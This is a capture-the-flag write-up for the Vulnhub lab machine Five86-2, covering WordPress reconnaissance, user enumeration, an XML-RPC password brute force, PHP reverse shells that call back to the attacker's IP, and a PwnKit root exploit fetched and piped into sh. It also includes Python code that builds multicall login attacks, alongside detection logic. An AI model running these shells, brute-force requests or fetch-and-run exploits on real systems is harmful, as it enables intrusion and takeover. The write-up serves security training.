Five86-2 - Vulnhub - Level: Medium - Report

Medium

Tools used

nmap
curl
Nikto
Gobuster
WPScan
zip
nc
find
cat
stty
sh

Table of Contents

Reconnaissance

In this section we carry out the first reconnaissance steps to gather information about the target system. This is essential for identifying potential attack vectors.

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.118 08:00:27:5c:a0:4d PCS Systemtechnik GmbH

The ARP scan reveals the target's IP and MAC address. The vendor string "PCS Systemtechnik GmbH" is the OUI registration for the 08:00:27 prefix, which VirtualBox uses for its virtual NICs; nmap labels the same address "Oracle VirtualBox virtual NIC" below.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.118 five86_2.vln

The /etc/hosts entry maps the IP address to the hostname five86_2.vln, so the hostname can be used instead of the IP. Note that WordPress on this box is configured with the site URL http://five86-2 (visible in the REST API output and in the wp-signup.php redirect further down) and redirects to that name, so five86-2 also has to resolve to 192.168.2.118 on the attacking machine; the later commands use it.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
21/tcp open ftp ProFTPD 1.3.5e
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

This Nmap command filters the output down to lines containing "open". Ports 21 (FTP, ProFTPD 1.3.5e) and 80 (HTTP, Apache 2.4.41) are open.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 22:24 CEST
Nmap scan report for five86_2.vln (192.168.2.118)
Host is up (0.00019s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open   ftp      ProFTPD 1.3.5e
80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.1.4
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Five86-2 – Just another WordPress site
MAC Address: 08:00:27:5C:A0:4D (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.0 - 5.5 (93%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 5.0 (91%), Linux 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Nmap performs a full scan of the target system.

  • -sS: TCP SYN scan (half-open scan)
  • -sC: runs the default NSE scripts against the detected services.
  • -sV: detects the version of each running service.
  • -A: enables aggressive options (OS detection, version detection, script scanning, traceroute); -sC and -sV are therefore redundant here.
  • -p-: scans all 65535 TCP ports.
  • $IP: shell variable holding the target IP address.
  • -Pn: skips host discovery and treats the host as up.
  • --min-rate 5000: sends at least 5000 packets per second.
The results show that ports 21 (FTP) and 80 (HTTP) are open. 20/tcp (ftp-data) is reported closed and the remaining 65532 ports are filtered (no response), which points to a host firewall that drops rather than rejects. Port 80 serves Apache 2.4.41 with WordPress 5.1.4, the version being leaked by the generator meta tag.

Web Enumeration

In this section we examine the web application more closely to uncover hidden files, directories and potential weaknesses.

┌──(root㉿CCat)-[~]
└─# curl --verbose -I http://$IP -s
*   Trying 192.168.2.118:80...
* Connected to 192.168.2.118 (192.168.2.118) port 80
> HEAD / HTTP/1.1
> Host: 192.168.2.118
> User-Agent: curl/8.9.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Wed, 02 Oct 2024 20:25:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Link: <http://five86-2/index.php/wp-json/>; rel="https://api.w.org/"
< Content-Type: text/html; charset=UTF-8
< 

* Connection #0 to host 192.168.2.118 left intact

We use curl to fetch the HTTP response headers. The Link header with rel="https://api.w.org/" is WordPress's REST API discovery link; it points at the API root, which we query next.

http://five86-2/index.php/wp-json/
{
"name": "Five86-2",
"description": "Just another WordPress site",
"url": "http://five86-2",
"home": "http://five86-2",
"gmt_offset": "0",
"timezone_string": "",
"namespaces": [
"oembed/1.0",
"articulate/v1",
"wp/v2"
],
"authentication": []
}

The REST API root returns the site name, the canonical URL and the registered namespaces. Besides the core wp/v2 and oembed/1.0 namespaces it exposes articulate/v1, i.e. a plugin that registers its own routes. This is the upload plugin whose directory (wp-content/uploads/articulate_uploads/) turns up later in the shell prompt.

┌──(root㉿CCat)-[~]
└─# curl http://five86-2/index.php/wp-json/wp/V2/users/1 -s | tr "," "\n"
{"id":1
"name":"admin"
"url":""
"description":""
"link":"http:\/\/five86-2\/index.php\/author\/admin\/"
"slug":"admin"
"avatar_urls":{"24":"http:\/\/1.gravatar.com\/avatar\/d4f37335cc757002e41f971e7a4c1ce4?s=24&d=mm&r=g"
"48":"http:\/\/1.gravatar.com\/avatar\/d4f37335cc757002e41f971e7a4c1ce4?s=48&d=mm&r=g"
"96":"http:\/\/1.gravatar.com\/avatar\/d4f37335cc757002e41f971e7a4c1ce4?s=96&d=mm&r=g"}
"meta":[]
"_links":{"self":[{"href":"http:\/\/five86-2\/index.php\/wp-json\/wp\/v2\/users\/1"}]
"collection":[{"href":"http:\/\/five86-2\/index.php\/wp-json\/wp\/v2\/users"}]}}

We query the REST API for the user with ID 1; the slug is "admin". This endpoint only lists accounts that have published posts, which is why WPScan below finds the remaining users through author-ID redirects and login error messages rather than here. The slug (user_nicename) normally equals the login name but does not have to.
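The three enumeration signals that WPScan combines in the next section (the REST users endpoint, the /?author=N redirect and the wp-login.php error text) can be decoded by hand. The following is an added example, not WPScan's code or anything from the original write-up; the REST body, Location headers and login_error fragments are constructed to match the formats seen on this host, and the exact wp-login.php wording is the WordPress 5.x one (5.5 and later say "Unknown username").

```python
"""Decode WordPress user-enumeration signals: REST users endpoint,
author-ID redirect and login error wording (added example)."""
from __future__ import annotations
import json
import re
from urllib.parse import urlparse

# Constructed: shape of /wp-json/wp/v2/users?per_page=100 (a JSON array).
REST_BODY = json.dumps([
    {"id": 1, "name": "admin", "slug": "admin",
     "link": "http://five86-2/index.php/author/admin/"},
])

# Constructed: Location headers answered to /?author=N for a few IDs.
AUTHOR_REDIRECTS = {
    2: "http://five86-2/index.php/author/barney/",
    3: "http://five86-2/index.php/author/peter/",
    4: "http://five86-2/index.php/author/gillian/",
    99: "http://five86-2/",          # no such author ID: back to the front page
}

# Constructed: login_error div returned by wp-login.php (WordPress 5.x wording).
LOGIN_ERRORS = {
    "stephen": '<div id="login_error"><strong>ERROR</strong>: The password you entered '
               'for the username <strong>stephen</strong> is incorrect.</div>',
    "nobody":  '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>',
}


def users_from_rest(body: str) -> list[str]:
    """Slugs from /wp-json/wp/v2/users or /users/N. Only accounts that have
    published a post are listed, so absence here proves nothing."""
    data = json.loads(body)
    if isinstance(data, dict):          # single-user form, e.g. /users/1
        data = [data]
    return [u["slug"] for u in data if "slug" in u]


_AUTHOR = re.compile(r"/author/([^/?#]+)/?$")

def slug_from_author_redirect(location: str) -> str | None:
    """/?author=N redirects to /author/<slug>/ when the ID exists (this is
    WPScan's 'Author Id Brute Forcing - Author Pattern'); None otherwise."""
    m = _AUTHOR.search(urlparse(location).path)
    return m.group(1) if m else None


def login_error_says_user_exists(html: str) -> bool | None:
    """True: wrong password for an existing account. False: no such user.
    None: neither message present (blocked, captcha, other version)."""
    if "Invalid username" in html or "Unknown username" in html:
        return False
    if "password you entered for the username" in html:
        return True
    return None


def enumerate_users(rest_body, author_redirects, login_pages) -> dict[str, set[str]]:
    """Merge all three sources into {username: {evidence, ...}}."""
    found: dict[str, set[str]] = {}
    for slug in users_from_rest(rest_body):
        found.setdefault(slug, set()).add("wp-json")
    for _id, loc in author_redirects.items():
        slug = slug_from_author_redirect(loc)
        if slug:
            found.setdefault(slug, set()).add("author-redirect")
    for user, html in login_pages.items():
        if login_error_says_user_exists(html):
            found.setdefault(user, set()).add("login-error")
    return found


if __name__ == "__main__":
    for user, evidence in sorted(enumerate_users(REST_BODY, AUTHOR_REDIRECTS, LOGIN_ERRORS).items()):
        print(f"{user:10} {', '.join(sorted(evidence))}")
```

The merge step is the point: each source alone misses users (the REST endpoint only shows admin, the redirect only works for sequential IDs, the login oracle needs a candidate name), and a real engagement treats the union as the user list and the per-source evidence as the confidence.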

┌──(root㉿CCat)-[~]
└─# Nikto v2.5.0
+ Target IP:          192.168.2.118
+ Target Hostname:    192.168.2.118
+ Target Port:        80
+ Start Time:         2024-10-02 22:27:45 (GMT2)

+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: ; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index.php?: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ /wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2024-10-02 22:28:31 (GMT2) (46 seconds)

+ 1 host(s) tested

Nikto is a web server scanner that checks for known files, misconfigurations and missing hardening. The findings here: missing X-Frame-Options and X-Content-Type-Options headers, an outdated Apache version, a browsable /wp-content/uploads/ directory, the test cookie set without HttpOnly, and version-leaking files (readme/license, wp-links-opml.php). The "Drupal Link header" line is a false positive: rel="https://api.w.org/" is WordPress's REST API discovery link, not Drupal.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.118/index.php            (Status: 301) [Size: 0] [--> http://192.168.2.118/]
http://192.168.2.118/wp-content           (Status: 301) [Size: 319] [--> http://192.168.2.118/wp-content/]
http://192.168.2.118/wp-content           (Status: 301) [Size: 319] [--> http://192.168.2.118/wp-content/]
http://192.168.2.118/wp-login.php         (Status: 200) [Size: 3190]
http://192.168.2.118/license.txt          (Status: 200) [Size: 19935]
http://192.168.2.118/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.2.118/wp-includes/]
http://192.168.2.118/readme.html          (Status: 200) [Size: 7425]
http://192.168.2.118/wp-trackback.php     (Status: 200) [Size: 135]
http://192.168.2.118/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.2.118/wp-admin/]
http://192.168.2.118/xmlrpc.php           (Status: 405) [Size: 42]
http://192.168.2.118/wp-signup.php        (Status: 302) [Size: 0] [--> http://five86-2/wp-login.php?action=register]

Gobuster finds the standard WordPress files and directories. readme.html and license.txt confirm the version, xmlrpc.php answers 405 to GET but accepts POST (WPScan confirms below that it is enabled), and wp-signup.php redirects to http://five86-2/, the canonical hostname WordPress is configured with.

Initial Access

In this section we try to gain initial access to the system.

┌──(root㉿CCat)-[~]
└─# wpscan --url http://five86-2/ --passwords /usr/share/wordlists/rockyou.txt -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://five86-2/ [192.168.2.118]
[+] Started: Wed Oct  2 22:39:39 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://five86-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/


[+] WordPress theme in use: twentynineteen
 | Location: http://five86-2/wp-content/themes/twentynineteen/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://five86-2/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3
 | Style Name: Twenty Nineteen
 | Style URI: https://github.com/WordPress/twentynineteen
 | Description: ur 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:


[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://five86-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] barney
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gillian
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] stephen
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 5 user/s
 
 [+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - barney / spooky1
[SUCCESS] - stephen / apollo1
                                                                 
 
[!] Valid Combinations Found:
 | Username: barney, Password: spooky1
 | Username: stephen, Password: apollo1

^Cying admin / daniela Time: 00:00:03 <               > (325 / 71722399)  0.00%  ETA: ??:??:??
Scan Aborted: Canceled by User

We use WPScan to gather WordPress-specific information, enumerate users (-e u) and run a password attack with rockyou.txt. WPScan identifies the users admin, barney, peter, gillian and stephen and recovers the passwords for barney and stephen. The attack runs over xmlrpc.php rather than wp-login.php: with system.multicall many login attempts are packed into a single POST, which is faster and bypasses lockout plugins that only watch the login form. We abort the remaining run (71722399 combinations) once two valid pairs are found.
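The exchange behind that password attack, and the server-side counter a defender would use to spot it, reproduced as an added example. This is not WPScan's or WordPress's code; the server response is constructed to mirror the shape of WordPress's wp.getUsersBlogs result and its fault struct for bad credentials, and the exact faultString is an assumption.

```python
"""XML-RPC system.multicall credential attack: request builder, response
decoder and a per-request login counter for detection (added example)."""
from __future__ import annotations
import xmlrpc.client as xc

# Methods that authenticate with their first two params; any of them works
# as a credential oracle, wp.getUsersBlogs is the usual choice.
LOGIN_METHODS = {"wp.getUsersBlogs", "wp.getUsers", "wp.getProfile", "wp.getPosts"}


def build_multicall(candidates: list[tuple[str, str]]) -> str:
    """One POST body carrying every (user, password) attempt. The attempts
    never touch wp-login.php, so form-based lockouts do not count them."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [u, p]} for u, p in candidates]
    return xc.dumps((calls,), methodname="system.multicall")


def build_single_call(user: str, password: str) -> str:
    """What a legitimate client sends: one login per request."""
    return xc.dumps((user, password), methodname="wp.getUsersBlogs")


# Constructed: a non-login call, to show the counter ignores it.
BENIGN_REQUEST = xc.dumps(("hello",), methodname="demo.sayHello")


def parse_multicall_response(body: str, candidates) -> list[tuple[str, str]]:
    """system.multicall returns one entry per call, in order: a one-element
    array wrapping the result on success, a {faultCode, faultString} struct
    on failure. Successful entries identify valid credentials."""
    (results,), _ = xc.loads(body)
    return [(u, p) for (u, p), r in zip(candidates, results) if isinstance(r, list)]


def count_login_attempts(request_body: str) -> int:
    """Detection side: login-bearing calls in a single request. A client sends
    one; dozens in one POST is a brute force whatever the source IP is."""
    params, method = xc.loads(request_body)
    if method == "system.multicall":
        return sum(1 for c in params[0] if c.get("methodName") in LOGIN_METHODS)
    return 1 if method in LOGIN_METHODS else 0


def constructed_response(verdicts: list[bool]) -> str:
    """Build the XML a WordPress server would answer, one entry per attempt
    (constructed; blog struct and fault text are assumptions)."""
    ok = [{"isAdmin": False, "url": "http://five86-2/", "blogid": "1",
           "blogName": "Five86-2", "xmlrpc": "http://five86-2/xmlrpc.php"}]
    bad = {"faultCode": 403, "faultString": "Incorrect username or password."}
    return xc.dumps(([[ok] if v else bad for v in verdicts],), methodresponse=True)


if __name__ == "__main__":
    cands = [("barney", "spooky1"), ("barney", "123456"), ("stephen", "apollo1")]
    print("attempts in one request:", count_login_attempts(build_multicall(cands)))
    print("valid:", parse_multicall_response(constructed_response([True, False, True]), cands))
```

On the defensive side the counter is the useful part: a single POST to xmlrpc.php whose multicall contains more than a handful of authenticating methods is a credential attack, and this is visible in the request body even when every attempt comes from a different IP. Disabling xmlrpc.php, or at least system.multicall, removes the amplification entirely.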

We log in to WordPress with the recovered credentials.

Since uploading the first shell did not work, we switch to a different one. The first attempt, shell.php, was a plain bash reverse shell:

┌──(root㉿CCat)-[/home/ccat/Downloads]
└─# cat shell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.2.199/9001 0>&1'");

The replacement shell, index.php, opens the socket itself with fsockopen and hands it to /bin/sh via proc_open, so it does not depend on bash or /dev/tcp being available on the target:

┌──(root㉿CCat)-[/home/ccat/Downloads]
└─# cat index.php
<?php
$sock = fsockopen("192.168.2.199", 9001);
$proc = proc_open("/bin/sh -i", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);

We create a zip containing the shell files (index.php and an index.html whose contents are not shown).

┌──(root㉿CCat)-[/home/ccat/Downloads]
└─# zip poc.zip index.php index.html
adding: index.php (deflated 20%)
adding: index.html (deflated 11%)

We start a listener on port 9001 and wait for the callback.

┌──(root㉿CCat)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.118] 36340
/bin/sh: 0: can't access tty; job control turned off
$ 

We get a shell as www-data. The prompt in the next section shows the working directory /var/www/html/wp-content/uploads/articulate_uploads/poc: the plugin unpacked poc.zip below its uploads directory, where index.php could be requested directly.

Privilege Escalation

In this section we try to escalate our privileges on the system to obtain root access.

┌──(root㉿CCat)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.118] 36340
/bin/sh: 0: can't access tty; job control turned off
$ find / -type f -perm -4000 -ls 2>/dev/null
       66     40 -rwsr-xr-x   1 root     root        40152 Jun 14  2022 /snap/core/17200/bin/mount
       80     44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /snap/core/17200/bin/ping
       81     44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /snap/core/17200/bin/ping6
       98     40 -rwsr-xr-x   1 root     root        40128 Feb  7  2024 /snap/core/17200/bin/su
      116     27 -rwsr-xr-x   1 root     root        27608 Jun 14  2022 /snap/core/17200/bin/umount 
     2606    331 -rwsr-xr-x   1 root     root              338536 Jun 26 13:11 /snap/core22/1621/usr/lib/openssh/ssh-keysign
     8635     19 -rwsr-xr-x   1 root     root               18736 Feb 26  2022 /snap/core22/1621/usr/libexec/polkit-agent-helper-1
      685     88 -rwsr-xr-x   1 root     root               88272 Aug 29  2019 /usr/bin/gpasswd
      883     32 -rwsr-xr-x   1 root     root               31032 Aug 16  2019 /usr/bin/pkexec
     3470     32 -rwsr-x---   1 peter    ncgroup            30856 Apr 13  2017 /usr/bin/nc.traditional
      492     56 -rwsr-sr-x   1 daemon   daemon             55560 Nov 12  2018 /usr/bin/at
      816     56 -rwsr-xr-x   1 root     root               55528 Aug 21  2019 /usr/bin/mount
     1086     68 -rwsr-xr-x   1 root     root               67816 Aug 21  2019 /usr/bin/su
      560     84 -rwsr-xr-x   1 root     root               84848 Aug 29  2019 /usr/bin/chfn
      671     36 -rwsr-xr-x   1 root     root               34896 Mar  5  2019 /usr/bin/fusermount
      566     48 -rwsr-xr-x   1 root     root               48784 Aug 29  2019 /usr/bin/chsh
      862     68 -rwsr-xr-x   1 root     root               67992 Aug 29  2019 /usr/bin/passwd
     1156     40 -rwsr-xr-x   1 root     root               39144 Aug 21  2019 /usr/bin/umount
     1087    160 -rwsr-xr-x   1 root     root              161448 Oct 15  2019 /usr/bin/sudo
      830     44 -rwsr-xr-x   1 root     root               44600 Aug 29  2019 /usr/bin/newgrp
     1597    444 -rwsr-xr-x   1 root     root              453096 Sep 12  2019 /usr/lib/openssh/ssh-keysign
     1365     52 -rwsr-xr--   1 root     messagebus         51184 Jun 11  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
     1607     24 -rwsr-xr-x   1 root     root               22840 Aug 16  2019 /usr/lib/policykit-1/polkit-agent-helper-1
     7745    116 -rwsr-sr-x   1 root     root              117672 Aug 30  2019 /usr/lib/snapd/snap-confine
     1373     16 -rwsr-xr-x   1 root     root               14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device

We search for SUID binaries. /usr/bin/nc.traditional stands out: it is not a stock SUID binary, it is owned by peter with group ncgroup, and its mode -rwsr-x--- means only members of ncgroup can execute it, after which it runs as peter rather than root. As www-data we are not in that group (the id output below lists only www-data), so this is a lateral step meant for another user, not our path. /usr/bin/pkexec, built in Aug 2019, is the candidate we use instead.
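The triage applied above to nc.traditional (who does the binary run as, can the current user execute it at all, is it part of a stock install) can be done mechanically over the whole listing. The following is an added example and not part of the write-up; the four sample lines are taken from the listing above, and the BASELINE set is an assumption about a typical Ubuntu install of that era, meant as a triage aid rather than an exhaustive list.

```python
"""Triage a `find / -perm -4000 -ls` listing: run-as user, executability
for the current user, and deviation from a stock baseline (added example)."""
from __future__ import annotations

# Assumed stock SUID binaries on a typical Ubuntu install of that era.
BASELINE = {
    "mount", "umount", "su", "sudo", "passwd", "chsh", "chfn", "gpasswd",
    "newgrp", "pkexec", "fusermount", "ssh-keysign", "at", "ping", "ping6",
    "dbus-daemon-launch-helper", "polkit-agent-helper-1", "snap-confine",
    "dmcrypt-get-device",
}

# Lines taken from the listing above (nc.traditional with its full mode string).
SAMPLE_LISTING = """\
      883     32 -rwsr-xr-x   1 root     root               31032 Aug 16  2019 /usr/bin/pkexec
     3470     32 -rwsr-x---   1 peter    ncgroup            30856 Apr 13  2017 /usr/bin/nc.traditional
      492     56 -rwsr-sr-x   1 daemon   daemon             55560 Nov 12  2018 /usr/bin/at
     1087    160 -rwsr-xr-x   1 root     root              161448 Oct 15  2019 /usr/bin/sudo
"""


def parse_ls_line(line: str) -> dict | None:
    """`find -ls` columns: inode blocks mode links owner group size mon day year|time path."""
    f = line.split(None, 10)
    if len(f) < 11 or len(f[2]) < 10:
        return None
    return {"mode": f[2][:10], "owner": f[4], "group": f[5], "path": f[10].rstrip()}


def classify(entry: dict, my_groups: tuple[str, ...] = ()) -> set[str]:
    """Tags answering the questions that matter for escalation: who does it
    run as, can I execute it (world x bit, or group x bit plus membership),
    and is it something a stock install would not have."""
    mode, owner, group = entry["mode"], entry["owner"], entry["group"]
    tags: set[str] = set()
    if mode[3] in "sS":                       # setuid bit sits in the owner-x slot
        tags.add("runs-as-root" if owner == "root" else f"runs-as-{owner}")
    if mode[6] in "sS":                       # setgid bit sits in the group-x slot
        tags.add(f"setgid-{group}")
    world_x = mode[9] in "xt"
    group_x = mode[6] in "xs"
    if world_x:
        tags.add("world-executable")
    elif group_x and group in my_groups:
        tags.add("group-executable")
    else:
        tags.add("not-runnable")              # needs membership in the file's group
    if entry["path"].rsplit("/", 1)[-1] not in BASELINE:
        tags.add("non-baseline")
    return tags


def triage(listing: str, my_groups: tuple[str, ...] = ()) -> dict[str, set[str]]:
    out: dict[str, set[str]] = {}
    for line in listing.splitlines():
        e = parse_ls_line(line)
        if e:
            out[e["path"]] = classify(e, my_groups)
    return out


if __name__ == "__main__":
    # As www-data on the box above; on a real target feed `id -nG` output here.
    for path, tags in triage(SAMPLE_LISTING, my_groups=("www-data",)).items():
        print(f"{path:28} {' '.join(sorted(tags))}")
```

Run with the groups of the shell you actually have: with my_groups=("www-data",) nc.traditional comes out as runs-as-peter and not-runnable, i.e. a non-baseline binary that is interesting for a peter-side user but a dead end for us, while pkexec is runs-as-root and world-executable, which is exactly the combination worth researching first.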

www-data@five86-2:/var/www/html/wp-content/uploads/articulate_uploads/poc$ stty rows 48 columns 94

By now the shell has been upgraded to an interactive bash (the prompt reads www-data@five86-2; the upgrade step itself is not shown). stty sets the terminal's rows and columns so full-screen programs render correctly.

www-data@five86-2:/var/www/html/wp-content/uploads/articulate_uploads/poc$ cd /tmp/
www-data@five86-2:/tmp$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@five86-2:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

We run the PwnKit exploit (CVE-2021-4034, the local privilege escalation in polkit's SUID pkexec) straight from GitHub; the SUID listing shows a pkexec built in Aug 2019, well before the fix, and the shell comes back as root. Two practical caveats: the one-liner needs outbound internet access from the target, and piping an unreviewed remote script into sh is acceptable on a lab box, but on a real engagement the exploit should be downloaded, reviewed and transferred to the target first.

root@five86-2:/tmp# cd ~
root@five86-2:~# ls
snap thisistheflag.txt
root@five86-2:~# cat thisistheflag.txt

Flags

__   __            _                           _                                 _ _ _ _ _ 
\ \ / /           | |                         | |                               | | | | | |
 \ V /___  _   _  | |__   __ ___   _____    __| | ___  _ __   ___  __      _____| | | | | |
  \ // _ \| | | | | '_ \ / _` \ \ / / _ \  / _` |/ _ \| '_ \ / _ \ \ \ /\ / / _ \ | | | | |
  | | (_) | |_| | | | | | (_| |\ V /  __/ | (_| | (_) | | | |  __/  \ V  V /  __/ | |_|_|_|
  \_/\___/ \__,_| |_| |_|\__,_| \_/ \___|  \__,_|\___/|_| |_|\___|   \_/\_/ \___|_|_(_|_|_)